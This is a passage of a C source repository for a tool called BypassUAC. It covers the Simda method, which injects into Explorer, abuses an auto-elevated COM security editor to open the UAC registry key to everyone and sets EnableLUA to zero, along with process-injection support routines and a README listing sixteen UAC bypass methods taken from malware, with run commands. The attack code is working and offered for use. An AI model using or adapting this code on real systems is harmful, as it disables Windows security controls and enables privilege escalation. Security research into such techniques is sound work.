 78 | 
 79 | 		pps = NULL;
 80 | 		r = SecurityEditor1->lpVtbl->GetSecurity(
 81 | 			SecurityEditor1,
 82 | 			elvpar->szTargetObject,
 83 | 			elvpar->ObjectType,
 84 | 			elvpar->SecurityInformation,
 85 | 			&pps
 86 | 			);
 87 | 
 88 | 		if ((r == S_OK) && (pps != NULL)) {
 89 | 			elvpar->xOutputDebugStringW(pps);
 90 | 		}
 91 | 
 92 | 		r = SecurityEditor1->lpVtbl->SetSecurity(
 93 | 			SecurityEditor1,
 94 | 			elvpar->szTargetObject,
 95 | 			elvpar->ObjectType,
 96 | 			elvpar->SecurityInformation,
 97 | 			elvpar->szNewSDDL
 98 | 			);
 99 | 
100 | 		if (r == S_OK) {
101 | 			elvpar->xOutputDebugStringW(elvpar->szNewSDDL);
102 | 		}
103 | 
104 | 
105 | 	} while (cond);
106 | 
107 | 	if (SecurityEditor1 != NULL) {
108 | 		SecurityEditor1->lpVtbl->Release(SecurityEditor1);
109 | 	}
110 | 
111 | 	elvpar->xCoUninitialize();
112 | 
113 | 	return r;
114 | }
115 | 
116 | /*
117 | * ucmSimdaAlterObjectSecurity
118 | *
119 | * Purpose:
120 | *
121 | * Set new entry in object DACL.
122 | *
123 | */
124 | BOOL ucmSimdaAlterObjectSecurity(
125 | 	SE_OBJECT_TYPE ObjectType,
126 | 	SECURITY_INFORMATION SecurityInformation,
127 | 	LPWSTR lpTargetObject,
128 | 	LPWSTR lpSddlString
129 | 	)
130 | {
131 | 	BOOL    cond = FALSE, bResult = FALSE;
132 | 	SIZE_T  cch;
133 | 
134 | 	//just a basic check
135 | 	if (
136 | 		(lpTargetObject == NULL) ||
137 | 		(lpSddlString == NULL)
138 | 		)
139 | 	{
140 | 		return FALSE;
141 | 	}
142 | 
143 | 	cch = _strlen_w(lpTargetObject);
144 | 	if ((cch == 0) || (cch > MAX_PATH)) {
145 | 		return FALSE;
146 | 	}
147 | 	cch = _strlen_w(lpSddlString);
148 | 	if ((cch == 0) || (cch > MAX_PATH)) {
149 | 		return FALSE;
150 | 	}
151 | 
152 | 
153 | 	do {
154 | 
155 | 		_strcpy_w(g_ElevParams2.EleMoniker, L"Elevation:Administrator!new:{4D111E08-CBF7-4f12-A926-2C7920AF52FC}");
156 | 		_strcpy_w(g_ElevParams2.szTargetObject, lpTargetObject);
157 | 		_strcpy_w(g_ElevParams2.szNewSDDL, lpSddlString);
158 | 
159 | 		if (CLSIDFromString(L"{4D111E08-CBF7-4f12-A926-2C7920AF52FC}",
160 | 			&g_ElevParams2.xCLSID_ShellSecurityEditor) != NOERROR)
161 | 		{
162 | 			break;
163 | 		}
164 | 
165 | 		if (IIDFromString(L"{14B2C619-D07A-46EF-8B62-31B64F3B845C}",
166 | 			&g_ElevParams2.xIID_ISecurityEditor) != S_OK)
167 | 		{
168 | 			break;
169 | 		}
170 | 
171 | 		g_ElevParams2.ObjectType = ObjectType;
172 | 		g_ElevParams2.SecurityInformation = SecurityInformation;
173 | 		g_ElevParams2.xCoInitialize = (pfnCoInitialize)GetProcAddress(g_ctx.hOle32, "CoInitialize");
174 | 		g_ElevParams2.xCoCreateInstance = (pfnCoCreateInstance)GetProcAddress(g_ctx.hOle32, "CoCreateInstance");
175 | 		g_ElevParams2.xCoGetObject = (pfnCoGetObject)GetProcAddress(g_ctx.hOle32, "CoGetObject");
176 | 		g_ElevParams2.xCoUninitialize = (pfnCoUninitialize)GetProcAddress(g_ctx.hOle32, "CoUninitialize");
177 | 		g_ElevParams2.xOutputDebugStringW = (pfnOutputDebugStringW)GetProcAddress(g_ctx.hKernel32, "OutputDebugStringW");
178 | 
179 | 		bResult = ucmInjectExplorer(&g_ElevParams2, ucmElevatedAlterSecurityProc);
180 | 
181 | 	} while (cond);
182 | 
183 | 	return bResult;
184 | }
185 | 
186 | /*
187 | * ucmSimdaTurnOffUac
188 | *
189 | * Purpose:
190 | *
191 | * Disable UAC using AutoElevated undocumented ISecurityEditor interface.
192 | * Used by WinNT/Simda starting from 2010 year till today.
193 | *
194 | */
195 | BOOL ucmSimdaTurnOffUac(
196 | 	VOID
197 | 	)
198 | {
199 | 	BOOL		cond = FALSE, bResult = FALSE;
200 | 	DWORD		dwValue;
201 | 	LRESULT		lRet;
202 | 	HKEY		hKey;
203 | 
204 | 	do {
205 | 
206 | 		if (!ucmSimdaAlterObjectSecurity(
207 | 			SE_REGISTRY_KEY,
208 | 			DACL_SECURITY_INFORMATION,
209 | 			T_UACKEY,
210 | 			T_SDDL_ALL_FOR_EVERYONE)
211 | 			)
212 | 		{
213 | 			break;
214 | 		}
215 | 
216 | 		if (bResult) {
217 | 		
218 | 			lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE,	TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system"), 
219 | 				0, KEY_ALL_ACCESS, &hKey);
220 | 			if ((lRet == ERROR_SUCCESS) && (hKey != NULL)) {
221 | 				OutputDebugString(TEXT("[UCM] Key security compromised"));
222 | 				dwValue = 0;
223 | 				RegSetValueEx(hKey, TEXT("EnableLUA"), 0, REG_DWORD, (LPBYTE)&dwValue, sizeof(DWORD));
224 | 				RegCloseKey(hKey);
225 | 			}
226 | 		}
227 | 
228 | 	} while (cond);
229 | 
230 | 	return bResult;
231 | }
232 | 


--------------------------------------------------------------------------------
/BypassUAC/simda.h:
--------------------------------------------------------------------------------
 1 | /*******************************************************************************
 2 | *
 3 | *  (C) COPYRIGHT AUTHORS, 2015 - 2016
 4 | *
 5 | *  TITLE:       SIMDA.H
 6 | *
 7 | *  VERSION:     2.00
 8 | *
 9 | *  DATE:        16 Nov 2015
10 | *
11 | *  Prototypes and definitions for Simda method.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 | 
21 | BOOL ucmSimdaTurnOffUac(
22 | 	VOID
23 | 	);
24 | 
25 | BOOL ucmSimdaAlterObjectSecurity(
26 | 	SE_OBJECT_TYPE ObjectType,
27 | 	SECURITY_INFORMATION SecurityInformation,
28 | 	LPWSTR lpTargetObject,
29 | 	LPWSTR lpSddlString
30 | 	);
31 | 


--------------------------------------------------------------------------------
/BypassUAC/sup.c:
--------------------------------------------------------------------------------
  1 | /*******************************************************************************
  2 | *
  3 | *  (C) COPYRIGHT AUTHORS, 2015 - 2016
  4 | *
  5 | *  TITLE:       SUP.C
  6 | *
  7 | *  VERSION:     2.00
  8 | *
  9 | *  DATE:        16 Nov 2015
 10 | *
 11 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
 12 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
 13 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
 14 | * PARTICULAR PURPOSE.
 15 | *
 16 | *******************************************************************************/
 17 | 
 18 | #include "global.h"
 19 | 
 20 | /*
 21 | * supIsProcess32bit
 22 | *
 23 | * Purpose:
 24 | *
 25 | * Return TRUE if given process is under WOW64, FALSE otherwise.
 26 | *
 27 | */
 28 | BOOLEAN supIsProcess32bit(
 29 | 	_In_ HANDLE hProcess
 30 | 	)
 31 | {
 32 | 	NTSTATUS status;
 33 | 	PROCESS_EXTENDED_BASIC_INFORMATION pebi;
 34 | 
 35 | 	if (hProcess == NULL) {
 36 | 		return FALSE;
 37 | 	}
 38 | 
 39 | 	//query if this is wow64 process
 40 | 	RtlSecureZeroMemory(&pebi, sizeof(pebi));
 41 | 	pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);
 42 | 	status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pebi, sizeof(pebi), NULL);
 43 | 	if (NT_SUCCESS(status)) {
 44 | 		return (pebi.IsWow64Process == 1);
 45 | 	}
 46 | 	return FALSE;
 47 | }
 48 | 
 49 | /*
 50 | * supGetExplorerHandle
 51 | *
 52 | * Purpose:
 53 | *
 54 | * Returns Explorer process handle opened with maximum allowed rights or NULL on error.
 55 | *
 56 | */
 57 | HANDLE supGetExplorerHandle(
 58 | 	VOID
 59 | 	)
 60 | {
 61 | 	HWND	hTrayWnd = NULL;
 62 | 	DWORD	dwProcessId = 0;
 63 | 
 64 | 	hTrayWnd = FindWindow(TEXT("Shell_TrayWnd"), NULL);
 65 | 	if (hTrayWnd == NULL)
 66 | 		return NULL;
 67 | 
 68 | 	GetWindowThreadProcessId(hTrayWnd, &dwProcessId);
 69 | 	if (dwProcessId == 0)
 70 | 		return NULL;
 71 | 
 72 | 	return OpenProcess(MAXIMUM_ALLOWED, FALSE, dwProcessId);
 73 | }
 74 | 
 75 | /*
 76 | * supGetElevationType
 77 | *
 78 | * Purpose:
 79 | *
 80 | * Returns client elevation type.
 81 | *
 82 | */
 83 | BOOL supGetElevationType(
 84 | 	TOKEN_ELEVATION_TYPE *lpType
 85 | 	)
 86 | {
 87 | 	HANDLE hToken = NULL;
 88 | 	NTSTATUS status;
 89 | 	ULONG bytesRead = 0;
 90 | 
 91 | 	if (lpType == NULL) {
 92 | 		return FALSE;
 93 | 	}
 94 | 
 95 | 	status = NtOpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken);
 96 | 	if (!NT_SUCCESS(status)) {
 97 | 		SetLastError(RtlNtStatusToDosError(status));
 98 | 		return FALSE;
 99 | 	}
100 | 
101 | 	status = NtQueryInformationToken(hToken, TokenElevationType, lpType,
102 | 		sizeof(TOKEN_ELEVATION_TYPE), &bytesRead);
103 | 
104 | 	SetLastError(RtlNtStatusToDosError(status));
105 | 
106 | 	NtClose(hToken);
107 | 
108 | 	return (NT_SUCCESS(status));
109 | }
110 | 
111 | /*
112 | * supWriteBufferToFile
113 | *
114 | * Purpose:
115 | *
116 | * Create new file and write buffer to it.
117 | *
118 | */
119 | BOOL supWriteBufferToFile(
120 | 	_In_ LPWSTR lpFileName,
121 | 	_In_ PVOID Buffer,
122 | 	_In_ DWORD BufferSize
123 | 	)
124 | {
125 | 	HANDLE hFile;
126 | 	DWORD bytesIO;
127 | 
128 | 	if (
129 | 		(lpFileName == NULL) ||
130 | 		(Buffer == NULL) ||
131 | 		(BufferSize == 0)
132 | 		)
133 | 	{
134 | 		return FALSE;
135 | 	}
136 | 
137 | 	hFile = CreateFileW(lpFileName,
138 | 		GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL);
139 | 
140 | 	if (hFile == INVALID_HANDLE_VALUE) {
141 | 		return FALSE;
142 | 	}
143 | 
144 | 	WriteFile(hFile, Buffer, BufferSize, &bytesIO, NULL);
145 | 	CloseHandle(hFile);
146 | 
147 | 	return (bytesIO == BufferSize);
148 | }
149 | 
150 | /*
151 | * supRunProcess
152 | *
153 | * Purpose:
154 | *
155 | * Execute given process with given parameters.
156 | *
157 | */
158 | BOOL supRunProcess(
159 | 	_In_ LPWSTR lpszProcessName,
160 | 	_In_opt_ LPWSTR lpszParameters
161 | 	)
162 | {
163 | 	BOOL bResult;
164 | 	SHELLEXECUTEINFOW shinfo;
165 | 	RtlSecureZeroMemory(&shinfo, sizeof(shinfo));
166 | 
167 | 	if (lpszProcessName == NULL) {
168 | 		return FALSE;
169 | 	}
170 | 
171 | 	shinfo.cbSize = sizeof(shinfo);
172 | 	shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
173 | 	shinfo.lpFile = lpszProcessName;
174 | 	shinfo.lpParameters = lpszParameters;
175 | 	shinfo.lpDirectory = NULL;
176 | 	shinfo.nShow = SW_SHOW;
177 | 	bResult = ShellExecuteExW(&shinfo);
178 | 	if (bResult) {
179 | 		WaitForSingleObject(shinfo.hProcess, 0x8000);
180 | 		CloseHandle(shinfo.hProcess);
181 | 	}
182 | 	return bResult;
183 | }
184 | 
185 | /*
186 | * supRunProcessEx
187 | *
188 | * Purpose:
189 | *
190 | * Start new process in suspended state.
191 | *
192 | */
193 | HANDLE supRunProcessEx(
194 | 	_In_ LPWSTR lpszParameters,
195 | 	_In_opt_ LPWSTR lpCurrentDirectory,
196 | 	_Out_opt_ HANDLE *PrimaryThread
197 | 	)
198 | {
199 | 	BOOL cond = FALSE;
200 | 	LPWSTR pszBuffer = NULL;
201 | 	SIZE_T ccb;
202 | 	STARTUPINFOW sti1;
203 | 	PROCESS_INFORMATION pi1;
204 | 
205 | 	if (PrimaryThread) {
206 | 		*PrimaryThread = NULL;
207 | 	}
208 | 
209 | 	if (lpszParameters == NULL) {
210 | 		return NULL;
211 | 	}
212 | 
213 | 	ccb = (_strlen_w(lpszParameters) * sizeof(WCHAR)) + sizeof(WCHAR);
214 | 	pszBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, ccb);
215 | 	if (pszBuffer == NULL) {
216 | 		return NULL;
217 | 	}
218 | 
219 | 	_strcpy_w(pszBuffer, lpszParameters);
220 | 
221 | 	RtlSecureZeroMemory(&pi1, sizeof(pi1));
222 | 	RtlSecureZeroMemory(&sti1, sizeof(sti1));
223 | 	GetStartupInfoW(&sti1);
224 | 
225 | 	do {
226 | 
227 | 		if (!CreateProcessW(NULL, pszBuffer, NULL, NULL, FALSE,
228 | 			CREATE_DEFAULT_ERROR_MODE | NORMAL_PRIORITY_CLASS | CREATE_SUSPENDED,
229 | 			NULL, lpCurrentDirectory, &sti1, &pi1))
230 | 		{
231 | 			break;
232 | 		}
233 | 
234 | 		if (PrimaryThread) {
235 | 			*PrimaryThread = pi1.hThread;
236 | 		}
237 | 		else {
238 | 			CloseHandle(pi1.hThread);
239 | 		}
240 | 	} while (cond);
241 | 
242 | 	HeapFree(GetProcessHeap(), 0, pszBuffer);
243 | 
244 | 	return pi1.hProcess;
245 | }
246 | 
247 | /*
248 | * _filenameW
249 | *
250 | * Purpose:
251 | *
252 | * Return name part of filename.
253 | *
254 | */
255 | wchar_t *_filenameW(
256 | 	const wchar_t *f
257 | 	)
258 | {
259 | 	wchar_t *p = (wchar_t *)f;
260 | 
261 | 	if (f == 0)
262 | 		return 0;
263 | 
264 | 	while (*f != (wchar_t)0) {
265 | 		if (*f == (wchar_t)'\\')
266 | 			p = (wchar_t *)f + 1;
267 | 		f++;
268 | 	}
269 | 	return p;
270 | }
271 | 
272 | /*
273 | * supCopyMemory
274 | *
275 | * Purpose:
276 | *
277 | * Copies bytes between buffers.
278 | *
279 | * dest - Destination buffer
280 | * cbdest - Destination buffer size in bytes
281 | * src - Source buffer
282 | * cbsrc - Source buffer size in bytes
283 | *
284 | */
285 | void supCopyMemory(
286 | 	_Inout_ void *dest,
287 | 	_In_ size_t cbdest,
288 | 	_In_ const void *src,
289 | 	_In_ size_t cbsrc
290 | 	)
291 | {
292 | 	char *d = (char*)dest;
293 | 	char *s = (char*)src;
294 | 
295 | 	if ((dest == 0) || (src == 0) || (cbdest == 0))
296 | 		return;
297 | 	if (cbdest<cbsrc)
298 | 		cbsrc = cbdest;
299 | 
300 | 	while (cbsrc>0) {
301 | 		*d++ = *s++;
302 | 		cbsrc--;
303 | 	}
304 | }
305 | 
306 | /*
307 | * supQueryEntryPointRVA
308 | *
309 | * Purpose:
310 | *
311 | * Return EP RVA of the given PE file.
312 | *
313 | */
314 | DWORD supQueryEntryPointRVA(
315 | 	_In_ LPWSTR lpImageFile
316 | 	)
317 | {
318 | 	PVOID                       ImageBase;
319 | 	PIMAGE_DOS_HEADER           pdosh;
320 | 	PIMAGE_FILE_HEADER          pfh1;
321 | 	PIMAGE_OPTIONAL_HEADER      poh;
322 | 	DWORD                       epRVA = 0;
323 | 
324 | 	if (lpImageFile == NULL) {
325 | 		return 0;
326 | 	}
327 | 
328 | 	ImageBase = LoadLibraryExW(lpImageFile, 0, DONT_RESOLVE_DLL_REFERENCES);
329 | 	if (ImageBase) {
330 | 
331 | 		pdosh = (PIMAGE_DOS_HEADER)ImageBase;
332 | 		pfh1 = (PIMAGE_FILE_HEADER)((ULONG_PTR)ImageBase + (pdosh->e_lfanew + sizeof(DWORD)));
333 | 		poh = (PIMAGE_OPTIONAL_HEADER)((ULONG_PTR)pfh1 + sizeof(IMAGE_FILE_HEADER));
334 | 
335 | 		//AddressOfEntryPoint is in standard fields.
336 | 		epRVA = poh->AddressOfEntryPoint;
337 | 
338 | 		FreeLibrary(ImageBase);
339 | 	}
340 | 	return epRVA;
341 | }
342 | 
343 | /*
344 | * supSetParameter
345 | *
346 | * Purpose:
347 | *
348 | * Set parameter for payload execution.
349 | *
350 | */
351 | BOOL supSetParameter(
352 | 	LPWSTR lpParameter,
353 | 	DWORD cbParameter
354 | 	)
355 | {
356 | 	BOOL cond = FALSE, bResult = FALSE;
357 | 	HKEY hKey;
358 | 	LRESULT lRet;
359 | 
360 | 	hKey = NULL;
361 | 
362 | 	do {
363 | 		lRet = RegCreateKeyExW(HKEY_CURRENT_USER, T_AKAGI_KEY, 0, NULL,
364 | 			REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
365 | 
366 | 		if ((lRet != ERROR_SUCCESS) || (hKey == NULL)) {
367 | 			break;
368 | 		}
369 | 
370 | 		lRet = RegSetValueExW(hKey, T_AKAGI_PARAM, 0, REG_SZ,
371 | 			(LPBYTE)lpParameter, cbParameter);
372 | 
373 | 		bResult = (lRet == ERROR_SUCCESS);
374 | 
375 | 	} while (cond);
376 | 
377 | 	if (hKey) {
378 | 		RegCloseKey(hKey);
379 | 	}
380 | 
381 | 	return bResult;
382 | }
383 | 
384 | /*
385 | * supChkSum
386 | *
387 | * Purpose:
388 | *
389 | * Calculate partial checksum for given buffer.
390 | *
391 | */
392 | USHORT supChkSum(
393 | 	ULONG PartialSum,
394 | 	PUSHORT Source,
395 | 	ULONG Length
396 | 	)
397 | {
398 | 	while (Length--) {
399 | 		PartialSum += *Source++;
400 | 		PartialSum = (PartialSum >> 16) + (PartialSum & 0xffff);
401 | 	}
402 | 	return (USHORT)(((PartialSum >> 16) + PartialSum) & 0xffff);
403 | }
404 | 
405 | /*
406 | * supVerifyMappedImageMatchesChecksum
407 | *
408 | * Purpose:
409 | *
410 | * Calculate PE file checksum and compare it with checksum in PE header.
411 | *
412 | */
413 | BOOLEAN supVerifyMappedImageMatchesChecksum(
414 | 	_In_ PVOID BaseAddress,
415 | 	_In_ ULONG FileLength
416 | 	)
417 | {
418 | 	PUSHORT AdjustSum;
419 | 	PIMAGE_NT_HEADERS NtHeaders;
420 | 	USHORT PartialSum;
421 | 	ULONG HeaderSum;
422 | 	ULONG CheckSum;
423 | 
424 | 	HeaderSum = 0;
425 | 	PartialSum = supChkSum(0, (PUSHORT)BaseAddress, (FileLength + 1) >> 1);
426 | 
427 | 	NtHeaders = RtlImageNtHeader(BaseAddress);
428 | 	if (NtHeaders != NULL) {
429 | 		HeaderSum = NtHeaders->OptionalHeader.CheckSum;
430 | 		AdjustSum = (PUSHORT)(&NtHeaders->OptionalHeader.CheckSum);
431 | 		PartialSum -= (PartialSum < AdjustSum[0]);
432 | 		PartialSum -= AdjustSum[0];
433 | 		PartialSum -= (PartialSum < AdjustSum[1]);
434 | 		PartialSum -= AdjustSum[1];
435 | 	}
436 | 	else
437 | 	{
438 | 		PartialSum = 0;
439 | 		HeaderSum = FileLength;
440 | 	}
441 | 	CheckSum = (ULONG)PartialSum + FileLength;
442 | 	return (CheckSum == HeaderSum);
443 | }
444 | 
445 | /*
446 | * ucmShowMessage
447 | *
448 | * Purpose:
449 | *
450 | * Output message to user.
451 | *
452 | */
453 | VOID ucmShowMessage(
454 | 	LPWSTR lpszMsg
455 | 	)
456 | {
457 | 	if (lpszMsg) {
458 | 		MessageBoxW(GetDesktopWindow(),
459 | 			lpszMsg, PROGRAMTITLE, MB_ICONINFORMATION);
460 | 	}
461 | }
462 | 
463 | /*
464 | * ucmShowQuestion
465 | *
466 | * Purpose:
467 | *
468 | * Output message with question to user.
469 | *
470 | */
471 | INT ucmShowQuestion(
472 | 	LPWSTR lpszMsg
473 | 	)
474 | {
475 | 	return MessageBoxW(GetDesktopWindow(), lpszMsg, PROGRAMTITLE, MB_YESNO);
476 | }
477 | 


--------------------------------------------------------------------------------
/BypassUAC/sup.h:
--------------------------------------------------------------------------------
 1 | /*******************************************************************************
 2 | *
 3 | *  (C) COPYRIGHT AUTHORS, 2014 - 2016
 4 | *
 5 | *  TITLE:       SUP.H
 6 | *
 7 | *  VERSION:     2.00
 8 | *
 9 | *  DATE:        16 Nov 2015
10 | *
11 | *  Common header file for the program support routines.
12 | *
13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
16 | * PARTICULAR PURPOSE.
17 | *
18 | *******************************************************************************/
19 | #pragma once
20 | 
21 | BOOLEAN supIsProcess32bit(
22 | 	_In_ HANDLE hProcess
23 | 	);
24 | 
25 | HANDLE supGetExplorerHandle(
26 | 	VOID
27 | 	);
28 | 
29 | BOOL supGetElevationType(
30 | 	TOKEN_ELEVATION_TYPE *lpType
31 | 	);
32 | 
33 | BOOL supWriteBufferToFile(
34 | 	_In_ LPWSTR lpFileName,
35 | 	_In_ PVOID Buffer,
36 | 	_In_ DWORD BufferSize
37 | 	);
38 | 
39 | BOOL supRunProcess(
40 | 	_In_ LPWSTR lpszProcessName,
41 | 	_In_opt_ LPWSTR lpszParameters
42 | 	);
43 | 
44 | HANDLE supRunProcessEx(
45 | 	_In_ LPWSTR lpszParameters,
46 | 	_In_opt_ LPWSTR lpCurrentDirectory,
47 | 	_Out_opt_ HANDLE *PrimaryThread
48 | 	);
49 | 
50 | wchar_t *_filenameW(
51 | 	const wchar_t *f
52 | 	);
53 | 
54 | void supCopyMemory(
55 | 	_Inout_ void *dest,
56 | 	_In_ size_t cbdest,
57 | 	_In_ const void *src,
58 | 	_In_ size_t cbsrc
59 | 	);
60 | 
61 | DWORD supQueryEntryPointRVA(
62 | 	_In_ LPWSTR lpImageFile
63 | 	);
64 | 
65 | BOOL supSetParameter(
66 | 	LPWSTR lpParameter,
67 | 	DWORD cbParameter
68 | 	);
69 | 
70 | BOOLEAN supVerifyMappedImageMatchesChecksum(
71 | 	_In_ PVOID BaseAddress,
72 | 	_In_ ULONG FileLength
73 | 	);
74 | 
75 | VOID ucmShowMessage(
76 | 	LPWSTR lpszMsg
77 | 	);
78 | 
79 | INT ucmShowQuestion(
80 | 	LPWSTR lpszMsg
81 | 	);
82 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # BypassUAC
 2 | Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.
 3 | 
 4 | # System Requirements
 5 | 1.x86-32/x64 Windows 7/8/8.1/10 (client, some methods however works on server version too).
 6 | 
 7 | 2.Admin account with UAC set on default settings required.
 8 | 
 9 | # Usage
10 | Run executable from command line: BypassUAC_x86 [Key] [Param] or BypassUAC_x64 [Key] [Param]. See "Run examples" below for more info.
11 | 
12 | First param is number of method to use, second is optional command (executable file name including full path) to run. Second param can be empty - in this case program will execute elevated cmd.exe from system32 folder.
13 | 
14 | Keys (watch debug ouput with dbgview or similar for more info):
15 | 
16 | 1 - Leo Davidson sysprep method, this will work only on Windows 7 and Windows 8, used in multiple malware;
17 | 
18 | 2 - Tweaked Leo Davidson sysprep method, this will work only on Windows 8.1.9600;
19 | 
20 | 3 - Leo Davidson method tweaked by WinNT/Pitou developers, works from Windows 7 up to 10th2 10532;
21 | 
22 | 4 - Application Compatibility Shim RedirectEXE method, from WinNT/Gootkit. Works from Windows 7 up to 8.1.9600;
23 | 
24 | 5 - ISecurityEditor WinNT/Simda method, used to turn off UAC, works from Windows 7 up to Windows 10th1 100136;
25 | 
26 | 6 - Wusa method used by Win32/Carberp, tweaked to work with Windows 8/8.1 also;
27 | 
28 | 7 - Wusa method, tweaked to work from Windows 7 up to 10th1 10136;
29 | 
30 | 8 - Slightly modified Leo Davidson method used by Win32/Tilon, works only on Windows 7;
31 | 
32 | 9 - Hybrid method, combination of WinNT/Simda and Win32/Carberp + AVrf, works from Windows 7 up to 10th1 10136;
33 | 
34 | 10 - Hybrid method, abusing appinfo.dll way of whitelisting autoelevated applications and KnownDlls cache changes, works from Windows 7 up to 10th2 10532;
35 | 
36 | 11 - WinNT/Gootkit second method based on the memory patching from MS "Fix it" patch shim (and as side effect - arbitrary dll injection), works from Windows 7 up to 8.1.9600;
37 | 
38 | 12 - Windows 10 sysprep method, abusing different dll dependency added in Windows 10 (works up to 10th2 10558);
39 | 
40 | 13 - Hybrid method, abusing appinfo.dll way of whitelisting MMC console commands and EventViewer missing dependency, works from Windows 7 up to 10rs1 11082;
41 | 
42 | 14 - WinNT/Sirefef method, abusing appinfo.dll way of whitelisting OOBE.exe, works from Windows 7 up to 10th2 10558;
43 | 
44 | 15 - Win32/Addrop method, also used in Metasploit uacbypass module, works from Windows 7 up to 10rs1 11082;
45 | 
46 | 16 - Hybrid method working together with Microsoft GWX backdoor, work from Windows 7 up to 10rs1 11082.
47 | 
48 | 
49 | Note:
50 | 
51 | Several methods require process injection, so they won't work from wow64, use x64 edition of this tool;
52 | 
53 | Method (4) unavailable in 64 bit edition because of Shim restriction;
54 | 
55 | Method (6) unavailable in wow64 environment starting from Windows 8. Also target application unavailable in Windows 10;
56 | 
57 | Method (11) implemented in x86-32 version;
58 | 
59 | Method (13) implemented only in x64 version.
60 | 
61 | 
62 | Run examples:
63 | 
64 | BypassUAC_x86.ex 1 cmd.exe
65 | 
66 | BypassUAC_x64.ex 3 cmd.exe
67 | 
68 | 


--------------------------------------------------------------------------------
/Shared/_strcat.c:
--------------------------------------------------------------------------------
 1 | #include "rtltypes.h"
 2 | 
 3 | char *_strcat_a(char *dest, const char *src)
 4 | {
 5 | 	if ( (dest==0) || (src==0) )
 6 | 		return dest;
 7 | 
 8 | 	while ( *dest!=0 )
 9 | 		dest++;
10 | 
11 | 	while ( *src!=0 ) {
12 | 		*dest = *src;
13 | 		dest++;
14 | 		src++;
15 | 	} 
16 | 
17 | 	*dest = 0;
18 | 	return dest;
19 | }
20 | 
21 | wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)
22 | {
23 | 	if ( (dest==0) || (src==0) )
24 | 		return dest;
25 | 
26 | 	while ( *dest!=0 )
27 | 		dest++;
28 | 
29 | 	while ( *src!=0 ) {
30 | 		*dest = *src;
31 | 		dest++;
32 | 		src++;
33 | 	} 
34 | 
35 | 	*dest = 0;
36 | 	return dest;
37 | }
38 | 


--------------------------------------------------------------------------------
/Shared/_strcmp.c:
--------------------------------------------------------------------------------
 1 | #include "rtltypes.h"
 2 | 
 3 | int _strcmp_a(const char *s1, const char *s2)
 4 | {
 5 | 	char c1, c2;
 6 | 
 7 | 	if ( s1==s2 )
 8 | 		return 0;
 9 | 
10 | 	if ( s1==0 )
11 | 		return -1;
12 | 
13 | 	if ( s2==0 )
14 | 		return 1;
15 | 
16 | 	do {
17 | 		c1 = *s1;
18 | 		c2 = *s2;
19 | 		s1++;
20 | 		s2++;
21 | 	} while ( (c1 != 0) && (c1 == c2) );
22 | 	
23 | 	return (int)(c1 - c2);
24 | }
25 | 
26 | int _strcmp_w(const wchar_t *s1, const wchar_t *s2)
27 | {
28 | 	wchar_t	c1, c2;
29 | 
30 | 	if ( s1==s2 )
31 | 		return 0;
32 | 
33 | 	if ( s1==0 )
34 | 		return -1;
35 | 
36 | 	if ( s2==0 )
37 | 		return 1;
38 | 
39 | 	do {
40 | 		c1 = *s1;
41 | 		c2 = *s2;
42 | 		s1++;
43 | 		s2++;
44 | 	} while ( (c1 != 0) && (c1 == c2) );
45 | 	
46 | 	return (int)(c1 - c2);
47 | }
48 | 


--------------------------------------------------------------------------------
/Shared/_strcmpi.c:
--------------------------------------------------------------------------------
 1 | #include "rtltypes.h"
 2 | 
 3 | int _strcmpi_a(const char *s1, const char *s2)
 4 | {
 5 | 	char c1, c2;
 6 | 	
 7 | 	if ( s1==s2 )
 8 | 		return 0;
 9 | 
10 | 	if ( s1==0 )
11 | 		return -1;
12 | 
13 | 	if ( s2==0 )
14 | 		return 1;
15 | 
16 | 	do {
17 | 		c1 = locase_a(*s1);
18 | 		c2 = locase_a(*s2);
19 | 		s1++;
20 | 		s2++;
21 | 	} while ( (c1 != 0) && (c1 == c2) );
22 | 	
23 | 	return (int)(c1 - c2);
24 | }
25 | 
26 | int _strcmpi_w(const wchar_t *s1, const wchar_t *s2)
27 | {
28 | 	wchar_t c1, c2;
29 | 
30 | 	if ( s1==s2 )
31 | 		return 0;
32 | 
33 | 	if ( s1==0 )
34 | 		return -1;
35 | 
36 | 	if ( s2==0 )
37 | 		return 1;
38 | 
39 | 	do {
40 | 		c1 = locase_w(*s1);
41 | 		c2 = locase_w(*s2);
42 | 		s1++;
43 | 		s2++;
44 | 	} while ( (c1 != 0) && (c1 == c2) );
45 | 	
46 | 	return (int)(c1 - c2);
47 | }
48 | 


--------------------------------------------------------------------------------
/Shared/_strcpy.c:
--------------------------------------------------------------------------------
 1 | #include "rtltypes.h"
 2 | 
 3 | char *_strcpy_a(char *dest, const char *src)
 4 | {
 5 | 	char *p;
 6 | 
 7 | 	if ( (dest==0) || (src==0) )
 8 | 		return dest;
 9 | 
10 | 	if (dest == src)
11 | 		return dest;
12 | 
13 | 	p = dest;
14 | 	while ( *src!=0 ) {
15 | 		*p = *src;
16 | 		p++;
17 | 		src++;
18 | 	} 
